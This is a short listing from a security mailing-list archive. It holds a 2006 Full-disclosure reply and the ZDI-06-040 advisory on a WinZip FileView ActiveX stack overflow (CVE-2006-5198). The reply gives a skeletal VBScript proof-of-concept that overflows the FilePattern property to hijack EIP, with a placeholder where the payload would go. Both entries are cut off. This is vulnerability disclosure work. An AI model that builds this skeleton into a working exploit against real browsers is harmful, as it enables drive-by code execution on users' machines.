Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread Micheal Turner
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below; HTML HEAD TITLE/TITLE /HEAD BODY SCRIPT LANGUAGE=VBScript !-- Sub WZFILEVIEW_OnAfterItemAdd(Item) WZFILEVIEW.FilePattern = SMASHTHESTACKHERE end sub -- /SCRIPT OBJECT

ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread zdi-disclosures
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-040.html November 14, 2006 -- CVE ID: CVE-2006-5198 -- Affected Vendor: WinZip -- Affected Products: WinZip 10.0 (pre build 7245) -- TippingPoint(TM